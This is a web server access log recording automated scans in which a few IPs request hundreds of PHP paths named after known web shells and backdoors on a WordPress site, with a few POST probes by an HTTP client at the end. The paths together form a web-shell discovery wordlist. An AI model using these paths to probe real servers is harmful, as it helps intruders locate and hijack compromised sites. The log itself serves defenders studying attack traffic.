13.74.46.110 - - [12/Aug/2025:06:10:12 +0300] "GET /in.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:12 +0300] "GET /12.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:12 +0300] "GET /13.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:13 +0300] "GET /wp-content/plugins/awesome-coming-soon/come.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:13 +0300] "GET /packed.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:13 +0300] "GET /wp-load.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:13 +0300] "GET /wp-content/plugins/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:13 +0300] "GET /wp-admin/images/admin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:14 +0300] "GET /wp-activate.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:14 +0300] "GET /simple.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:14 +0300] "GET /ini.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:14 +0300] "GET /new.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:15 +0300] "GET /wp-includes/css/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:15 +0300] "GET /wp-theme.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:15 +0300] "GET /upfile.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:15 +0300] "GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:16 +0300] "GET /wp-conflg.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:16 +0300] "GET /plugins.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:16 +0300] "GET /ws.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:16 +0300] "GET /wso112233.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:16 +0300] "GET /moon.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:17 +0300] "GET /wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:17 +0300] "GET /xmrlpc.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:17 +0300] "GET /wp-content/themes/twentythirteen/functions.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:17 +0300] "GET /wp-cron.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:18 +0300] "GET /wzy.php?action=door123 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:18 +0300] "GET /.well-known/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:18 +0300] "GET /wp-includes/assets/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:18 +0300] "GET /simple.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:19 +0300] "GET /wp-content/plugins/simple/simple.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:19 +0300] "GET /makeasmtp.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:19 +0300] "GET /content.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:19 +0300] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:20 +0300] "GET /wp-content/themes/twentytwenty/functions.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:20 +0300] "GET /aa.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:20 +0300] "GET /flower.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:20 +0300] "GET /ae.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:21 +0300] "GET /cong.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:21 +0300] "GET /admin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:21 +0300] "GET /wp-content/themes/too.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:21 +0300] "GET /wp-admin/maint/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:21 +0300] "GET /wp-admin/maint/ HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:22 +0300] "GET /wp-admin/ HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:22 +0300] "GET /themes.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:22 +0300] "GET /wp-signup.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:22 +0300] "GET /radio.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:23 +0300] "GET /hehe.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:23 +0300] "GET /wp-includes/IXR/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:23 +0300] "GET /epinyins.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:23 +0300] "GET /wp-sigunq.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:24 +0300] "GET /mah.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:24 +0300] "GET /wp-content/themes/aahana/json.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:24 +0300] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:24 +0300] "GET /mail.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:24 +0300] "GET /as.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:25 +0300] "GET /app.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:25 +0300] "GET /wp-trackback.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:25 +0300] "GET /wp-comments-post.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:25 +0300] "GET /wp-content.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:26 +0300] "GET /css.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:26 +0300] "GET /lv.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:26 +0300] "GET /wp-mail.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:26 +0300] "GET /main.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:26 +0300] "GET /wp-content/themes/oceanwp/functions.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:27 +0300] "GET /nf_tracking.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:27 +0300] "GET /wp-blog-header.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:27 +0300] "GET /wp-content/themes/twentyeleven/functions.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:28 +0300] "GET /wp-content/plugins/not/includes/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:28 +0300] "GET /bak.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:28 +0300] "GET /wp-content/admin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:28 +0300] "GET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:28 +0300] "GET /wp-login.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:29 +0300] "GET /wp-includes/fonts/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:29 +0300] "GET /classsmtps.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:29 +0300] "GET /wp-content/plugins/admin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:29 +0300] "GET /wp-2019.php/chosen.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:30 +0300] "GET /wp-admin/maint/php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:30 +0300] "GET /0x.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:30 +0300] "GET /geju.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:30 +0300] "GET /goods.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:31 +0300] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:31 +0300] "GET /hoot.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:31 +0300] "GET /wp-content/plugins/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:31 +0300] "GET /wp-includes/Text/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:32 +0300] "GET /system_log.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:32 +0300] "GET /shell.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:32 +0300] "GET /post.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:32 +0300] "GET /xmlrpc.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:32 +0300] "GET /6.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:33 +0300] "GET /403.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:33 +0300] "GET /berlin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:33 +0300] "GET /wp-content/packed.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:33 +0300] "GET /fw.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:34 +0300] "GET /wp-2019.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:34 +0300] "GET /atomlib.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:34 +0300] "GET /lufix.php HTTP/1.1" 301 795 "-" "-"
101.99.76.20 - - [12/Aug/2025:06:02:40 +0300] "GET /wp-includes/js/dist/development/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke/wp-includes/js/dist/development/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:06:21 +0300] "GET /wp-includes/js/dist/development/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke/wp-includes/js/dist/development/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
13.74.46.110 - - [12/Aug/2025:06:10:34 +0300] "GET /doc.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:35 +0300] "GET /chosen.php HTTP/1.1" 301 795 "-" "-"
194.102.104.219 - - [12/Aug/2025:06:20:57 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke/wp-admin/css/colors/blue/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
170.106.143.6 - - [12/Aug/2025:06:25:19 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
40.87.154.63 - - [12/Aug/2025:06:28:51 +0300] "GET /.alf.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:51 +0300] "GET /.bod/.ll/ss.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:52 +0300] "GET /.well-known/about/function.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:52 +0300] "GET /.well-known/classwithtostring.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:52 +0300] "GET /.well-known/index.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:52 +0300] "GET /.well-known/radio.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:52 +0300] "GET /10.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:53 +0300] "GET /12.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:53 +0300] "GET /13k.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:53 +0300] "GET /87.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:53 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:54 +0300] "GET /about/Geforce.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:54 +0300] "GET /about/function.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:54 +0300] "GET /admin.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:54 +0300] "GET /admin/admin.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:54 +0300] "GET /admin/function.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:55 +0300] "GET /admin/index.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:55 +0300] "GET /adminfuns.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:55 +0300] "GET /akc.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:55 +0300] "GET /al.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:56 +0300] "GET /alfa.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:56 +0300] "GET /as.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:56 +0300] "GET /asasx.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:57 +0300] "GET /assets/images/doc.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:57 +0300] "GET /atomlib.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:58 +0300] "GET /auth.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:58 +0300] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:58 +0300] "GET /autoload_classmap/function.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:58 +0300] "GET /b.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:58 +0300] "GET /blog/fw.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:59 +0300] "GET /bugz.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:59 +0300] "GET /byp.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:59 +0300] "GET /cc.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:28:59 +0300] "GET /chosen.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:00 +0300] "GET /class.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:00 +0300] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:00 +0300] "GET /composer.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:00 +0300] "GET /css.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:01 +0300] "GET /dropdown.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:01 +0300] "GET /edit.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:01 +0300] "GET /f35.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:02 +0300] "GET /file.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:02 +0300] "GET /file2.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:02 +0300] "GET /filemanager.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:02 +0300] "GET /files/index.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:03 +0300] "GET /fix.php HTTP/1.1" 301 795 "-" "-"
101.99.88.90 - - [12/Aug/2025:06:29:03 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.87.154.63 - - [12/Aug/2025:06:29:03 +0300] "GET /flower.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:03 +0300] "GET /fox.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:03 +0300] "GET /function/function.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:03 +0300] "GET /g.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:04 +0300] "GET /gecko.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:04 +0300] "GET /gel4y.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:04 +0300] "GET /gelay.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:04 +0300] "GET /gg.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:05 +0300] "GET /goat.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:05 +0300] "GET /goods.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:05 +0300] "GET /h.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:05 +0300] "GET /images/admin.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:06 +0300] "GET /images/class-config.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:06 +0300] "GET /inc.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:06 +0300] "GET /index.bak.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:06 +0300] "GET /index/function.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:06 +0300] "GET /info.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:07 +0300] "GET /infos.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:07 +0300] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:07 +0300] "GET /k.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:07 +0300] "GET /m.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:08 +0300] "GET /mar.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:08 +0300] "GET /mini HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:08 +0300] "GET /mini.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:08 +0300] "GET /mm.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:08 +0300] "GET /ms-edit.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:09 +0300] "GET /ms-themes.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:09 +0300] "GET /options-general.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:09 +0300] "GET /options-reading.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:09 +0300] "GET /options-writing.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:10 +0300] "GET /web.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:10 +0300] "GET /wp-blog.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:10 +0300] "GET /wp-config-sample.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:10 +0300] "GET /wp-activat.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:10 +0300] "GET /pages.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:11 +0300] "GET /aa.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:11 +0300] "GET /nf.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:11 +0300] "GET /lock360.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:11 +0300] "GET /makeasmtp.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:12 +0300] "GET /php.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:12 +0300] "GET /install.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:12 +0300] "GET /php8.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:12 +0300] "GET /mah.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:13 +0300] "GET /pinfo.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:13 +0300] "GET /radio.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:13 +0300] "GET /robots.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:13 +0300] "GET /cong.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:14 +0300] "GET /function.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:14 +0300] "GET /buy.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:14 +0300] "GET /thoms.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:14 +0300] "GET /rt.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:14 +0300] "GET /s.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:15 +0300] "GET /setup.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:15 +0300] "GET /simple.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:15 +0300] "GET /sts.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:15 +0300] "GET /system_log.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:16 +0300] "GET /test1.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:16 +0300] "GET /themes/zMousse/otuz1.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:16 +0300] "GET /file/function.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:16 +0300] "GET /tinyfilemanager.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:17 +0300] "GET /ty.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:17 +0300] "GET /users.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:17 +0300] "GET /w.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:17 +0300] "GET /wp-aa.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:17 +0300] "GET /wp-admin.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:18 +0300] "GET /wp-admin/ HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:18 +0300] "GET /wp-admin/admin.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:18 +0300] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:18 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:19 +0300] "GET /wp-admin/css/colors/ectoplasm/about.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:19 +0300] "GET /wp-admin/css/colors/light/wp-login.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:19 +0300] "GET /wp-admin/images/moon.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:19 +0300] "GET /wp-admin/includes/colour.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:20 +0300] "GET /wp-includes/Text/wp-conflg.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:20 +0300] "GET /wp-admin/includes/header.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:20 +0300] "GET /wp-admin/includes/index.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:20 +0300] "GET /wp-admin/install.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:21 +0300] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:21 +0300] "GET /wp-admin/js/index.php HTTP/1.1" 301 795 "-" "-"
40.87.154.63 - - [12/Aug/2025:06:29:21 +0300] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 301 795 "-" "-"
101.99.88.90 - - [12/Aug/2025:06:15:10 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
101.99.88.90 - - [12/Aug/2025:06:15:13 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:15:16 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
